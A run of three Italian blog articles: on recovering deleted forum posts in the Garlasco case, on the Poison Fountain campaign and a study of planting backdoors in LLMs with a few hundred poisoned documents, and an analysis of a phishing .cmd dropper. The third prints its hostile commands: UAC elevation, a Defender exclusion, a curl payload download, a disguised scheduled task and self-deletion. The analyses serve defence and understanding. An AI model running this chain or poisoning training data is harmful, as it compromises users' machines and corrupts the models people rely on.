Spoiler: no, non può. Almeno non come la gente immagina.

E siccome il tema è diventato di interesse pubblico — con migliaia di post attribuiti ad Andrea Sempio sul forum Italian Seduction Club sotto il nickname “Andreas”, scritti tra il 2009 e il 2016 e ora finiti al centro dell’indagine — vale la pena fare un po’ di chiarezza tecnica. In modo semplice, ma onesto.

Il punto di partenza: cosa è successo davvero

Riassumo i fatti, perché servono per inquadrare il discorso. Sul forum citato sopra, l’utente “Andreas” — riconducibile, secondo la stessa difesa, ad Andrea Sempio — ha pubblicato migliaia di messaggi. La cifra che circola è quella ricostruita dalla redazione di MowMag e ripresa da diverse testate: il contatore del forum riporta 3.428 post a nome di Andrea S, di cui 3.362 effettivamente visitabili. Mancano all’appello una sessantina di messaggi.

Possono essere in sezioni riservate. Oppure possono essere stati cancellati. Curiosità: la possibilità di cancellare i propri post fu introdotta dall’amministratore del forum nell’estate 2016, al costo di 10 euro a post. Per Sempio, ripulire tutto sarebbe costato oltre 34.000 euro.

Quindi: se una sessantina di post fosse stata davvero rimossa, il tema — qui ed è ciò di cui voglio parlare — è capire se quei messaggi sarebbero in qualche modo recuperabili da parte degli inquirenti. La risposta breve è: praticamente no. Quella lunga richiede di spiegare un paio di cose.

Come funziona, tecnicamente, un forum

Un forum non è “una pagina web”. È un software che gira su un server e che, sotto il cofano, scrive ogni messaggio in un database. Pensate al database come a un foglio Excel gigantesco: ogni post è una riga, con dei campi (autore, data, testo, sezione, etc.).
Quando voi caricate la pagina del forum, il software pesca quelle righe dal database (dal nostro foglio Excel, per continuare con l’esempio di prima), le impagina con grafica e ve le mostra.

Questa è la prima cosa da tenere a mente: esiste una riga in un database, su un disco di un server, da qualche parte nel mondo. Esiste la riga nel nostro foglio Excel: se la cancelliamo, non è detto che sia recuperabile senza un backup.

Cosa succede davvero quando si “cancella” un messaggio

Qui c’è la prima distinzione importante, perché esistono due tipi di cancellazione:

• Cancellazione logica (soft delete). Il messaggio non viene rimosso davvero: il software cambia un campo nel database e da quel momento in poi, quando si carica la pagina, il messaggio non viene mostrato. Però è ancora lì.
  In questo caso sì, su richiesta dell’autorità giudiziaria, il gestore del forum può facilmente “ripescarlo” dal database.
  Per continuare nel nostro parallelismo con Excel: è come se barrassimo una riga. Questa è ancora lì, visibile, ma semplicemente la ignoriamo.

• Cancellazione fisica (hard delete). La riga viene proprio eliminata dalla tabella. A quel punto il database, per il software del forum, non sa più che quel messaggio sia mai esistito. E questo è lo scenario su cui si gioca tutta la discussione.

La maggior parte dei forum moderni implementa una cancellazione di tipo hard, soprattutto quando il servizio è a pagamento e il senso commerciale stesso dell’operazione è “sparire davvero”. Se pago 10 euro per cancellare un post e quello rimane nel database con un flag, il prodotto venduto sarebbe una truffa.

Il mito del “recupero forense”: perché in pratica non funziona

A questo punto il ragionamento del cugino-esperto è: «Sì, ma anche se la riga è cancellata dal database, sul disco rigido c’è una traccia. La polizia postale recupera tutto».
Questa è un’idea che viene dal folklore delle serie TV americane più che dalla realtà ed anzi, prende spesso il nome di “Effetto CSI” (di cui spesso parlo durante i miei speech).
Quando un dato viene cancellato fisicamente da un database, lo spazio sul disco non viene immediatamente azzerato: viene marcato come libero. Quel pezzo di disco, in teoria, potrebbe ancora contenere il vecchio dato fino a quando non viene riscritto.

In teoria. Perché su un server di un forum attivo, con migliaia di utenti che pubblicano in continuazione, lo spazio “libero” viene riutilizzato in tempi brevissimi — minuti, ore al massimo. Il vecchio messaggio viene sovrascritto da nuovi dati e a quel punto è perso davvero, anche per i forensi più attrezzati. È la stessa logica per cui, se cancellate un file dal vostro PC e continuate a usarlo, dopo qualche giorno non c’è più software al mondo che ve lo ripeschi.

Aggiungiamo che:

• I database moderni gestiscono lo spazio in pagine compattate, frammentate, indicizzate. Non si “leggono i bit” come si farebbe su un settore grezzo del disco.
• I server di forum di solito girano in datacenter su storage condiviso, con replicazione, snapshot rotanti, virtualizzazione. La nozione stessa di “disco fisico da analizzare” diventa fumosa.
• Anche se per assurdo si arrivasse a un blocco di dati ancora intatto, ricostruire il contesto (di chi era? quando? in quale thread?) senza i metadati del database è un lavoro spesso impossibile.

In pratica: una volta che un messaggio è stato cancellato fisicamente da un forum attivo, è perso. Punto. Non c’è perizia che tenga. L’unica cosa che la magistratura può ottenere è ciò che esiste ancora.

L’unica vera eccezione: i backup

C’è un caso in cui il messaggio cancellato può “tornare in vita”: se esiste un backup del database fatto prima della cancellazione.
I backup sono copie periodiche del database che il gestore conserva per sicurezza, in caso di guasti o attacchi informatici. A seconda della politica del forum, possono essere giornalieri, settimanali, mensili. Possono essere conservati per giorni o per anni.

Se un giudice chiede al gestore del forum di consegnare i backup e fra questi ce n’è uno antecedente alla cancellazione, allora sì: il messaggio è lì, basta aprirlo per leggerlo.

Sembra la soluzione magica, ma c’è un problema serio.

Ed è qui che la questione diventa giuridicamente delicatissima.
Un file di backup di un database è, alla fine, un file. Tipicamente un dump SQL, cioè un lungo elenco di istruzioni di testo. Si apre con un editor di testo qualsiasi. E si modifica con la stessa facilità.

Niente impedisce, tecnicamente, al gestore del forum (o a chiunque abbia accesso al server) di:

• Aggiungere post mai scritti, attribuendoli a un utente qualsiasi.
• Eliminare post realmente esistiti.
• Modificare il testo di post per renderli più (o meno) compromettenti.
• Cambiare date, ID utente, sezioni di pubblicazione.

E la modifica, fatta bene, è praticamente invisibile: quando si riapre il file modificato, non c’è alcuna “spia” che dice “questo backup è stato manomesso”. A meno che — ed è il punto cruciale — al momento della creazione del backup non sia stata generata una firma digitale o un hash crittografico del file, conservato in modo sicuro e indipendente (per esempio, depositato presso un terzo, certificato con marca temporale, etc…).
Cose che, vi assicuro, nessun forum amatoriale di seduzione fa. E che di solito non fanno nemmeno le piattaforme commerciali medie.
È una pratica che si trova in ambienti enterprise regolamentati: sanità, banche, telco. Non in un forum gestito da una S.r.l. italiana.

Risultato: anche se domani saltasse fuori un backup del 2015 con i 66 post mancanti di “Andreas”, in sede dibattimentale la difesa avrebbe gioco facile a sollevare il dubbio sull’integrità di quel file. Non perché sia stato modificato: ma perché non è dimostrabile che non sia stato modificato, ed è la procura a doverlo dimostrare. La validità probatoria di un dato del genere è tutta da costruire — con perizie, testimonianze del gestore, ricostruzione della catena di custodia — e resta comunque fragile.

Le altre fonti residue (quelle che spesso si dimenticano)

Detto tutto questo, c’è una verità un po’ meno nota: anche se un messaggio è stato hard-cancellato, possono sopravvivere copie indirette in posti che non dipendono dal database del forum. Ed è qui che, paradossalmente, gli inquirenti hanno le possibilità migliori.

• Citazioni in messaggi di altri utenti. È il caso più tipico. Sui forum, quando si risponde a un post, spesso lo si “quota”: il testo originale viene incollato dentro la risposta. Se l’utente A scrive una frase compromettente e l’utente B gli risponde citandola, anche se A cancella il proprio post, la frase resta dentro il messaggio di B. È esattamente uno dei motivi per cui chi cerca di ripulire la propria storia online quasi sempre fallisce: i contenuti rimbalzano.

• Web Archive (archive.org) e altri crawler. Le pagine pubbliche dei forum vengono spesso indicizzate dai crawler. Se la pagina con il messaggio incriminato era visibile senza login ed è stata “fotografata” da Wayback Machine prima della cancellazione, lì rimane per sempre — e in quel caso parliamo di una fonte terza, indipendente, datata, di valore probatorio molto più solido di un backup interno. Il limite: i forum che richiedono iscrizione per essere consultati di solito non vengono indicizzati.

• Screenshot e copie fatte da altri utenti. Banalissimi, ma esistono. E possono essere prodotti come prove — con tutti i caveat del caso, perché anche uno screenshot si fabbrica in cinque minuti con Photoshop.

• Cache di motori di ricerca. Storicamente Google teneva una “copia cache” delle pagine che indicizzava. Oggi questa funzionalità è stata in gran parte smantellata, ma per pagine vecchie può ancora capitare di trovarne traccia in archivi specializzati.

Un caso a parte: il modello “cancellazione a pagamento”

Tutto il discorso fatto finora vale per i forum standard, dove l’utente può cancellare i propri post liberamente o, in alcuni casi, non può proprio farlo. Il forum Italian Seduction Club però funzionava in modo abbastanza singolare, e merita un capitolo a parte perché tocca direttamente il caso Garlasco — e perché solleva questioni giuridiche molto più ampie.

Fino all’estate 2016, su quel forum non era proprio possibile cancellare i propri messaggi: una volta scritto, un post restava lì. Poi l’amministratore — secondo la ricostruzione di MOW Magazine, l’unica testata ad aver lavorato direttamente sulla fonte primaria — pubblicò un annuncio che introduceva una novità: la cancellazione era ora possibile, ma a pagamento, 10 euro a post. Quella stessa comunicazione ricevette pochissimi like, sette in totale: uno di questi era di “Andrea S.”. È il genere di dettaglio che, in OSINT, si chiama behavioral signal: il segnale di un interesse specifico per la nuova funzionalità appena introdotta.

Per “Andrea S.”, che aveva accumulato 3.428 post, cancellare tutto avrebbe richiesto un esborso di circa 34.280 euro. È in larga parte la ragione per cui la sua storia digitale è arrivata fino a noi: la pulizia integrale era economicamente proibitiva. Una pulizia mirata su un piccolo numero di post compromettenti, però, sarebbe stata alla portata di chiunque: dei 3.428 post a contatore, solo 3.362 risultano oggi visitabili. Ne mancano 66. Possono essere in sezioni riservate del forum (ne esiste una chiamata Predator, accessibile solo agli utenti di livello “elite”), oppure possono essere stati fatti rimuovere a pagamento, per un costo complessivo di 660 euro. Una cifra accessibile.

Su questo modello commerciale, però, c’è da fare una nota giuridica importante.

Il GDPR, articolo 17 — il famoso “diritto all’oblio” — prevede che ogni utente possa chiedere la cancellazione dei propri dati personali al titolare del trattamento, gratuitamente, e con tempistiche stabilite per legge. Il forum è gestito da una società lettone-italiana, pienamente soggetta al Regolamento europeo. Quindi il “servizio commerciale” da 10 euro a post non era affatto l’unica strada per rimuovere i propri contenuti: una semplice PEC ben formulata avrebbe avuto, sulla carta, lo stesso effetto, gratis.

C’è però una differenza non da poco, e qui il discorso scivola dal diritto alla strategia. Una richiesta GDPR via PEC lascia una traccia documentale: una mail certificata, datata, indirizzata a un soggetto giuridico identificabile, che il titolare del trattamento è obbligato a conservare nei propri registri per anni. Il pagamento di 10 euro a post, invece, è un’operazione di mercato sostanzialmente anonima: paghi, il post sparisce, e all’esterno non resta documentazione né del fatto che hai cancellato qualcosa, né di che cosa hai cancellato.

Per chi volesse semplicemente esercitare un proprio diritto, dunque, la strada economicamente sensata sarebbe stata la PEC. Per chi volesse far sparire qualcosa di specifico senza che restasse documentato il fatto stesso di averlo voluto far sparire, la strada giusta era il pagamento. Sul piano investigativo, è una distinzione che pesa: una richiesta GDPR genera una prova di volontà (cosa è stato chiesto, quando, da chi); un pagamento commerciale, no.

Insomma, il modello del forum non era progettato per garantire i diritti degli utenti. Era progettato per monetizzare il bisogno di sparire in silenzio. Cosa che, peraltro, in caso di un’eventuale segnalazione al Garante per la Protezione dei Dati Personali, potrebbe non essere proprio una passeggiata difensiva per il titolare del trattamento.

Conclusioni

• Un messaggio cancellato fisicamente da un forum, in condizioni normali, non è recuperabile. Né dal gestore, né dall’autorità giudiziaria, né da consulenti tecnici esterni, indipendentemente da quante puntate di CSI si siano viste.
• L’unica eccezione realistica sono i backup precedenti la cancellazione, ma la loro validità probatoria è tutt’altro che scontata, perché un file di backup è facilmente modificabile e — a meno di firme digitali certificate al momento della creazione, cosa rara — non è possibile dimostrare a posteriori che non lo sia stato.
• Le fonti più affidabili, quando esistono, sono quelle indirette e indipendenti dal forum: citazioni dentro post di altri utenti, archivi pubblici come Wayback Machine, eventuali copie locali. Sono spesso la vera fonte da cui i giornalisti, e poi gli inquirenti, riescono a ricostruire ciò che qualcuno ha cercato di far sparire.
• Nel caso specifico di Garlasco, la situazione è quasi paradossale: la stragrande maggioranza dei messaggi di “Andreas” — oltre 3.300 — non è mai stata cancellata, perché farlo costava troppo. Quindi gli inquirenti hanno avuto vita facile: il materiale era ed è ancora pubblicamente accessibile sul forum (a chi è iscritto). I 66 post che mancano all’appello, se davvero sono stati cancellati, sono con ogni probabilità persi — salvo, appunto, qualche eco in citazioni altrui o in cache pubbliche.

L'articolo Caso Garlasco: perché i messaggi di Sempio cancellati dal forum non si possono recuperare proviene da Luca Mercatanti.

Sembra la trama di un romanzo cyberpunk. È invece quanto sta accadendo davvero, e ha un nome: Poison Fountain, la “fontana avvelenata”.

Cos’è Poison Fountain

Poison Fountain è un progetto attivo da inizio gennaio 2026, raggiungibile all’indirizzo rnsaffn.com/poison3 (più un mirror sulla rete Tor con dominio .onion, pensato per resistere a eventuali tentativi di shutdown). L’idea è semplice nella forma e devastante nella sostanza: i webmaster e i blogger di tutto il mondo sono invitati a inserire nelle proprie pagine dei link che puntano a dataset progettati apposta per danneggiare i modelli di intelligenza artificiale che li scansionano.

I crawler AI — quei bot che giorno e notte aspirano contenuti dal web per alimentare l’addestramento di GPT, Claude, Gemini e compagnia — finirebbero così a ingerire codice volutamente difettoso, contenente bug logici sottili e errori sistematici progettati per degradare la qualità delle risposte dei modelli che si addestrano su quel materiale.

Sul sito del progetto si legge una dichiarazione d’intenti che non lascia spazio a interpretazioni:

“Siamo d’accordo con Geoffrey Hinton: l’intelligenza artificiale è una minaccia per la specie umana. In risposta a questa minaccia vogliamo infliggere danni ai sistemi di intelligenza artificiale.”

E ancora, l’invito esplicito ai visitatori: “Aiuta lo sforzo bellico mettendo in cache e ritrasmettendo questi dati di addestramento avvelenati” e “aiuta lo sforzo bellico fornendo questi dati di addestramento avvelenati ai web crawler”. Il linguaggio è bellicoso, deliberatamente. Non è marketing: è un manifesto.

Chi c’è dietro? Insider delle Big Tech AI

Qui la storia si fa più interessante — e più imbarazzante per il settore. Secondo la fonte che ha contattato The Register (rimasta anonima “per ovvie ragioni”), i promotori di Poison Fountain sono cinque persone che lavorano in alcune delle più grandi aziende AI statunitensi. Non ricercatori esterni, non attivisti senza esperienza tecnica: ingegneri che costruiscono ogni giorno questi modelli e che, vedendo da dentro cosa stanno effettivamente realizzando i loro clienti, hanno deciso di reagire.

Il gruppo ha promesso a The Register prove crittografiche (firme PGP) per dimostrare che dietro al progetto ci sia effettivamente più di una persona. Al momento in cui scrivo, queste prove non sono ancora state diffuse pubblicamente.

La motivazione è esposta in modo brutale dalla stessa fonte:

“Hinton ha chiaramente esposto il pericolo, ma noi vediamo che ha ragione e che la situazione sta peggiorando in un modo di cui il pubblico non è generalmente consapevole. Vediamo cosa stanno costruendo i nostri clienti.”

Cosa stiano costruendo questi clienti, l’insider non l’ha voluto specificare. Ma il messaggio implicito è chiaro: chi ha accesso ai casi d’uso reali — quelli che non finiscono nei comunicati stampa — è preoccupato abbastanza da decidere di sabotare il suo stesso lavoro.

Il tallone d’Achille degli LLM: bastano 250 documenti

A questo punto sorge la domanda legittima: è davvero così facile avvelenare un modello da centinaia di miliardi di parametri? Non occorre forse contaminare una percentuale enorme dei dati di training? La risposta, sorprendentemente, è no — e la pubblicazione che ha cambiato le carte in tavola arriva proprio da Anthropic.

Nell’ottobre 2025, in collaborazione con l’UK AI Security Institute e l’Alan Turing Institute, Anthropic ha pubblicato uno studio definito “la più grande indagine sul data poisoning mai condotta”. Il risultato ha lasciato di stucco anche gli addetti ai lavori: per compromettere un LLM, non serve avvelenare una percentuale dei dati. Basta un numero quasi fisso di documenti.

I numeri parlano da soli:

• I ricercatori hanno testato modelli da 600 milioni fino a 13 miliardi di parametri.
• Sono bastati 250 documenti malevoli — circa 420.000 token in totale — per installare con successo una backdoor in tutti i modelli testati.
• In termini relativi, parliamo dello 0,00016% del totale dei dati di addestramento. Una goccia nel mare.
• L’effetto è risultato indipendente dalla dimensione del modello: il modello più grande, addestrato con 20 volte più dati “puliti”, è stato compromesso dallo stesso numero di documenti avvelenati.

Il meccanismo è quello della cosiddetta backdoor: una frase di trigger (nel caso dello studio Anthropic, la stringa <SUDO>) che, quando appare in un prompt, fa “scattare” il comportamento malevolo. Nello studio si trattava semplicemente di far generare al modello del testo casuale (un attacco “denial of service”), ma nulla impedisce in linea teorica di costruire trigger più sofisticati che inducano il modello a generare codice difettoso, esfiltrare informazioni o aggirare le guardrail di sicurezza.

Il dettaglio importante, e che probabilmente ha ispirato Poison Fountain, è il seguente: creare 250 documenti malevoli è banale. Creare milioni, no. Lo scenario, prima di questo studio, sembrava implausibile per ragioni di scala. Adesso è alla portata di chiunque abbia un blog WordPress e qualche ora libera.

Come funziona concretamente l’attacco

Il modus operandi di Poison Fountain ricalca in modo letterale i risultati del paper Anthropic. Dal punto di vista tecnico:

1. Il sito ospite (cioè quello del webmaster “complice”, più o meno consapevole) inserisce un link che punta a una pagina del progetto.
2. Il crawler AI — sia esso GPTBot di OpenAI, ClaudeBot di Anthropic, Google-Extended o uno dei tanti scraper meno noti — segue il link e ne aspira il contenuto.
3. Il contenuto avvelenato consiste in snippet di codice apparentemente plausibile, ma con bug logici sottili: variabili scambiate, condizioni invertite, gestione degli errori volutamente sbagliata, pattern di sicurezza scorretti.
4. Il modello, in fase di training, ingerisce questi esempi insieme a tutto il resto e impara — statisticamente — a riprodurre quegli stessi errori quando gli si chiederà di generare codice analogo.

L’aspetto più insidioso è che gli errori non sono macroscopici (un programmatore se ne accorgerebbe immediatamente). Sono sottili: ad esempio un controllo di autenticazione che funziona nel 99% dei casi ma cede in una particolare condizione al limite, oppure un algoritmo crittografico implementato con un parametro errato che lo rende vulnerabile. Il tipo di errore che, in produzione, può costare molto caro.

Non è la prima volta: il caso Nightshade

Poison Fountain non è il primo tentativo organizzato di reagire allo scraping aggressivo dei modelli AI. Già nel gennaio 2024 era nato Nightshade, un software sviluppato all’Università di Chicago dal team di Ben Zhao, pensato per “avvelenare” le immagini caricate online dagli artisti. L’idea era simile: introdurre in modo invisibile (ai nostri occhi) delle perturbazioni nei file immagine, in modo che i modelli text-to-image che le ingerissero come training data finissero per associare concetti completamente sbagliati (un cane diventava un gatto, un’auto diventava una mucca, e così via).

La differenza fondamentale è il target e chi sta agendo. Nightshade nasceva dalla comunità degli artisti, preoccupata per la sottrazione non autorizzata delle proprie opere. Poison Fountain nasce dall’interno dell’industria AI stessa, e ha come bersaglio non un singolo dominio (le immagini) ma il cuore stesso degli LLM: il codice e il testo.

Model collapse: l’IA si sta già avvelenando da sola

C’è un aspetto della storia che andrebbe sottolineato di più: è probabile che, anche senza Poison Fountain, i modelli AI si stiano già avvelenando da soli. È il fenomeno del cosiddetto model collapse.

Il meccanismo è semplice e perverso: i modelli vengono addestrati su dati raccolti dal web; ma sempre più contenuti del web vengono oggi generati dai modelli stessi (articoli automatici, recensioni fake, post sui social, commenti, codice generato e poi pubblicato senza revisione). Il risultato è un loop in cui l’IA si nutre del proprio “vomito”, amplificando errori e bias di generazione in generazione. Un paper recente, pubblicato a fine 2025, prevede che il “serpente AI” potrebbe iniziare a mangiarsi la coda in modo critico già intorno al 2035.

Non a caso, le grandi aziende AI stanno facendo a gara per stringere accordi di licenza con fonti “pulite” e curate — Wikipedia in primis, ma anche editori giornalistici e database scientifici — per evitare di pescare solo dal pantano del web pubblico. Poison Fountain, in un certo senso, accelera intenzionalmente un processo che sta già avvenendo per inerzia.

Il dilemma etico (e giuridico)

A questo punto è inevitabile fare qualche riflessione, perché la questione non è banale.

Da un lato c’è chi sostiene — e Poison Fountain ne è la voce più estrema — che lo scraping massivo dei contenuti web da parte delle aziende AI sia un’appropriazione indebita su scala industriale: contenuti prodotti con fatica da editori, programmatori, artisti, blogger, finiscono dentro modelli commerciali da miliardi di dollari, senza alcuna remunerazione e spesso ignorando il file robots.txt. In quest’ottica, “avvelenare” il pozzo è una forma di legittima difesa contro un’attività predatoria.

Dall’altro lato, va detto chiaramente che iniettare deliberatamente codice difettoso nel pubblico dominio è eticamente discutibile. Quel codice potrebbe finire copiato e incollato non solo in un modello AI, ma anche da uno sviluppatore umano in cerca di soluzioni rapide. Una vulnerabilità “piantata” come trappola anti-AI può facilmente trasformarsi in una vulnerabilità reale in produzione. Il danno collaterale, in altre parole, è tutt’altro che teorico.

C’è poi il tema giuridico, ancora largamente inesplorato: in molti ordinamenti, il sabotaggio deliberato di sistemi informatici altrui — anche se “passivo”, anche se ottenuto inducendo qualcuno a leggere contenuti volontariamente pubblicati — potrebbe configurare reati specifici. Vedremo come si muoveranno le procure nei prossimi mesi.

Cosa cambia per chi si occupa di sicurezza informatica

Per chi, come me, si occupa professionalmente di sicurezza informatica e analisi forense, l’episodio Poison Fountain rappresenta un campanello d’allarme su un piano completamente nuovo. Tre considerazioni:

1. La supply chain dei dati è la nuova superficie d’attacco. Fino a ieri, parlando di software supply chain, intendevamo librerie, dipendenze, repository npm o PyPI compromessi. Oggi dobbiamo includere anche i dataset di training. Un SBOM (Software Bill of Materials) tradizionale non basta più: serve un equivalente per i dati.

2. Il codice generato da AI va trattato come “non fidato”. Già oggi diversi studi mostrano che gli sviluppatori si fidano poco del codice prodotto dagli LLM — ma poi spesso lo committano lo stesso, senza una revisione adeguata. Se il modello è stato avvelenato, quel codice contiene bug pianificati. La code review, l’analisi statica e il fuzzing diventano obbligatori, non opzionali.

3. Le aziende dovranno investire in “data hygiene”. Per i fornitori di modelli, identificare e filtrare i contenuti avvelenati prima del training diventerà una sfida ingegneristica enorme. Le tecniche di anomaly detection, watermarking crittografico dei dataset, validazione delle fonti, sono tutti settori in cui aspettarsi forti investimenti nei prossimi anni.

Il punto della situazione

Poison Fountain è probabilmente solo l’inizio. Indipendentemente dal fatto che il progetto specifico abbia successo (e la verità è che, da solo, difficilmente sposterà gli equilibri), la scoperta che bastano un pugno di documenti per compromettere modelli da decine di miliardi di parametri rappresenta una rivoluzione concettuale per chiunque si occupi di sicurezza dell’AI.

Quello che mi colpisce di più, però, non è l’aspetto tecnico. È il fatto che cinque persone che lavorano dentro l’industria AI abbiano deciso di sabotarla. Non per vendetta personale, non per soldi, non per vandalismo: per quello che sostengono di vedere ogni giorno nei progetti dei clienti delle loro aziende. È un sintomo di un disagio profondo, e merita di essere preso sul serio anche da chi — come me — non condivide affatto i toni “bellici” del manifesto.

Geoffrey Hinton, “padrino” del deep learning e premio Turing, ha lasciato Google nel 2023 proprio per poter parlare liberamente dei rischi dell’AI. Quando i tuoi stessi creatori cominciano a remare contro, forse vale la pena fermarsi un attimo e ragionare su che tipo di intelligenza artificiale vogliamo davvero costruire — e per chi.

Per approfondire, consiglio di leggere lo studio di Anthropic sul data poisoning e il paper completo su arXiv.

L'articolo Quando gli ingegneri dell’AI sabotano i propri modelli proviene da Luca Mercatanti.

Apri quella che credi sia una semplice immagine ricevuta via email e, in pochi secondi, qualcuno ottiene i privilegi di amministratore sul tuo PC, disattiva Windows Defender, scarica un payload mascherato da JPG, installa una persistenza camuffata da task di sistema e poi si autodistrugge per cancellare ogni traccia. Tutto questo senza che tu noti nulla, se non il fatto che — a un certo punto — il computer si riavvia “da solo”.

Quello che segue è il racconto di un’analisi reale, condotta a partire da un’email apparentemente innocua. Una di quelle situazioni che dimostrano come, nel 2026, la creatività degli attaccanti sia ormai diventata il vero limite del concetto di “antivirus”.

Il punto di partenza: un’email “strana”, un link più strano

Tutto nasce da una segnalazione. Un utente riceve un’email che contiene un link sospetto. Il dominio non significa nulla, l’URL utilizza un servizio di redirezione di Google (search.app), e già questo dovrebbe far suonare il primo campanello d’allarme. Quando un attaccante ha bisogno di nascondere il vero indirizzo finale, lo fa quasi sempre per un motivo: superare i controlli automatici dei filtri antispam e ingannare l’utente che, vedendo un dominio “noto”, abbassa la guardia.

L’URL incriminato, in forma anonimizzata, è hxxps://search[.]app/a3qBe. Cliccandoci sopra, non viene scaricata un’immagine come ci si potrebbe aspettare, ma un file con estensione .cmd. Già a questo punto chiunque abbia un minimo di pratica con la sicurezza informatica dovrebbe chiudere tutto e cestinare l’email. Eppure, nella vita reale, troppe persone fanno doppio click “tanto per vedere”.

Analisi del file .cmd: codice offuscato e PowerShell nascosto

Aprendo il file con un editor di testo, il primo impatto è sconfortante: il codice è completamente offuscato e a prima vista non si capisce nulla. Si intravedono però alcuni frammenti di comandi PowerShell, e questo è già un indizio prezioso. Quando un file batch invoca PowerShell con flag come -NoP (NoProfile) o -W H (Hidden Window), nove volte su dieci ci troviamo davanti a qualcosa di malevolo.

Per ricostruire il codice originale sono stati testati diversi tool di deoffuscamento (JSDeobfuscator, JSUnpack, Deobfuscate.io, Cyber Chief, Invoke-DOSfuscation), con risultati piuttosto deludenti. Curiosamente, il sistema che ha permesso di decifrare la parte più significativa del codice è stato un LLM (in questo caso Grok AI). È un dettaglio che mi piace sottolineare: l’intelligenza artificiale sta diventando uno strumento sempre più presente nelle attività di malware analysis, sia in attacco che in difesa.

Cosa fa davvero il malware, passo per passo

Una volta ripulito, il codice rivela una catena di azioni eseguite con un ordine molto preciso. Vediamole una per una, perché ognuna di esse è un piccolo manuale di “come funziona davvero il malware moderno”.

1. Privilege escalation (esecuzione come amministratore)

powershell -NoP -C "Start-Process -FilePath '%~f0' -Verb RunAs"

Il malware si rilancia da solo richiedendo i privilegi di amministratore tramite il flag -Verb RunAs. Quel famoso “consenti modifiche?” che tutti clicchiamo distrattamente è esattamente il momento in cui l’attacco prende il sopravvento sulla macchina.

2. Disattivazione di Windows Defender (esclusione cartella)

powershell -NoP -W H -C "Add-MpPreference -ExclusionPath '!install_dir!' -ErrorAction SilentlyContinue"

Una volta ottenuti i privilegi, il malware aggiunge la propria directory di lavoro alle esclusioni di Windows Defender. Tradotto: tutto ciò che eseguirà da quella cartella non sarà mai più scansionato. È una mossa elegante e devastante allo stesso tempo. La cartella, peraltro, viene creata in %LOCALAPPDATA%\Microsoft\ con uno spazio iniziale nel nome, trucco che la rende quasi invisibile a colpo d’occhio nelle interfacce standard.

3. Download del payload mascherato da JPG

"%SYSTEMROOT%\System32\curl.exe" -s -L --connect-timeout 15 --max-time 120 -o "!jpg_file!" "!url!"

Il payload viene scaricato sfruttando curl.exe, un binario perfettamente legittimo presente nativamente in Windows da diversi anni. Questa tecnica si chiama Living Off the Land (LOLBins) e consiste nell’utilizzare strumenti già presenti sul sistema per non dover introdurre eseguibili sospetti. Il file scaricato ha estensione .jpg, ma — sorpresa — non è un’immagine.

4. Estrazione dell’archivio camuffato

tar -xf "!zip_file!" -C "!install_dir!"

Il finto JPG viene rinominato in .zip ed estratto con tar, anch’esso ormai presente di default in Windows. All’interno dell’archivio si trovano due file: una DLL e un binario eseguibile, classico schema per sfruttare una vulnerabilità di tipo DLL side-loading (di cui parlerò più avanti).

5. Persistenza tramite Scheduled Task

schtasks /create /tn "\Microsoft\Windows\IntelGraphicsTask" /xml "!xml_file!" /f

Per garantire la persistenza, il malware crea uno scheduled task con un nome che imita perfettamente quelli legittimi di sistema (IntelGraphicsTask). Il task è configurato per partire al logon dell’utente, con un delay di 30 secondi e flag Hidden=true. Anche un occhio esperto, a una prima occhiata, non si insospettirebbe.

6. Riavvio forzato e autodistruzione

shutdown /r /t 60 /f
start /b cmd /c "ping 127.0.0.1 -n 3 >nul & del /f /q "%~f0""

Il colpo finale: il sistema viene riavviato forzatamente in 60 secondi (per finalizzare l’installazione e attivare lo scheduled task) e il file .cmd originale si autodistrugge. Il ping verso localhost è un trucco antico ma efficace: serve solo come “sleep” per dare il tempo allo script di terminare prima di cancellarsi.

Il finto JPG: quando l’immagine non è un’immagine

La parte più interessante, almeno dal punto di vista didattico, riguarda il file scaricato. L’URL accorciato (hxxps://is[.]gd/cjIjvU) reindirizza a un dominio dal nome volutamente innocuo: associatecountrynotifications[.]digital. Il file scaricato ha estensione .jpg e, tentando di aprirlo con un visualizzatore di immagini, restituisce semplicemente un errore “formato non supportato”.

Rinominandolo in .zip, però, l’archivio si apre senza problemi e al suo interno troviamo i due file di cui parlavo prima: una DLL e un eseguibile. È esattamente la tecnica del DLL side-loading: l’eseguibile sembra (e in parte è) legittimo, ma carica una DLL malevola posizionata nella stessa cartella, sfruttando il modo in cui Windows risolve le dipendenze.

L’analisi statica con PEStudio rivela diverse cose interessanti:

• 78 red flag identificati nella sola DLL;
• nessuna reputazione su VirusTotal (segno di un sample fresco di giornata);
• numerose funzioni duplicate negli import, una tecnica classica per confondere analisti e tool automatici;
• un compile time volutamente alterato e riportato a un’epoca in cui certi software non esistevano ancora — un piccolo “Ritorno al Futuro” pensato per ingannare le timeline forensi.

Cosa ci insegna questo caso

Al di là della componente tecnica, questo malware è un piccolo manuale di tutto ciò che oggi rende efficace un attacco moderno. Non c’è nessun exploit zero-day, nessuna magia nera, nessuna tecnica esoterica. Ci sono solo strumenti già presenti nel sistema operativo (curl, tar, PowerShell, schtasks), uno script ben scritto e qualche trucco di camuffamento. Eppure il risultato è una compromissione completa, persistente e quasi invisibile.

I tre punti che mi sembra utile fissare per chi legge sono:

• Le estensioni dei file mentono. Un .jpg può essere uno zip, uno zip può contenere un eseguibile, un eseguibile può caricare una DLL malevola. Mai fidarsi di ciò che si vede a colpo d’occhio.
• Le esclusioni di Windows Defender sono un’arma a doppio taglio. Se un processo riesce ad aggiungerne una, sopratutto con privilegi amministrativi, da quel momento in poi l’antivirus è cieco su quella cartella.
• Gli scheduled task sono il vero “Vecchio Trucco” della persistenza moderna. Un task con nome plausibile, eseguito in background con flag Hidden, è praticamente invisibile a chi non sa cosa cercare.

Come difendersi (concretamente)

Le buone pratiche, in casi come questo, sono sempre le stesse — ma vale la pena ripeterle:

• Disabilitare l’esecuzione automatica di script .cmd, .bat, .vbs, .js da parte di utenti standard tramite policy di gruppo.
• Limitare i privilegi amministrativi: l’utente quotidiano non dovrebbe mai operare come admin. È una banalità, eppure nel 90% degli ambienti aziendali che mi capita di analizzare, troviamo l’esatto contrario.
• Monitorare le modifiche alle esclusioni di Windows Defender tramite log di sistema (l’evento 5007 è il vostro miglior amico).
• Auditare periodicamente gli scheduled task, soprattutto quelli creati di recente e con nomi che mimano servizi di sistema.
• Educare gli utenti a non aprire mai file ricevuti da email anche solo lievemente sospette, soprattutto quando contengono link accorciati o redirezioni.

